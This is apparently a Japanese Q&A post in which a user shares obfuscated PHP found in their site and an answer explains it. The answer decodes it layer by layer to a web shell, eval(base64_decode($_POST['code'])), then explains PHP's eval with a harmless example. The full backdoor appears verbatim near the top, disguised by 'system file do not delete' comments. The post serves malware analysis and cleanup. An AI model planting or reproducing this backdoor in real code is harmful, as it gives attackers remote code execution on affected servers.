私はこれを私のphpファイルに持っていました。マルウェアのように見えますが、それが何を意味するのか知りたいです
<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
base64_decodeを見てください。
$___の略ですbase64_decode。次に$__、base64_decode が実行されて評価され、次の処理が実行されます。
$code = base64_decode($_);
eval($code);
最終的にこれを実行します:
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}
削除して、他のファイルも感染していないか確認することをお勧めします。
eval —文字列をPHPコードとして評価します
eval()言語構造は、任意のPHPコードを実行できるため、非常に危険です。したがって、その使用はお勧めしません。この構成を使用する以外に選択肢がないことを注意深く確認した場合は、事前に適切に検証せずに、ユーザーが提供したデータを渡さないように特に注意してください。
簡単な例:
<?php
$string = 'cup';
$name = 'coffee';
$str = 'This is a $string with my $name in it.';
echo $str. "\n";
eval("\$str = \"$str\";");
echo $str. "\n";
?>
出力
This is a $string with my $name in it.
This is a cup with my coffee in it.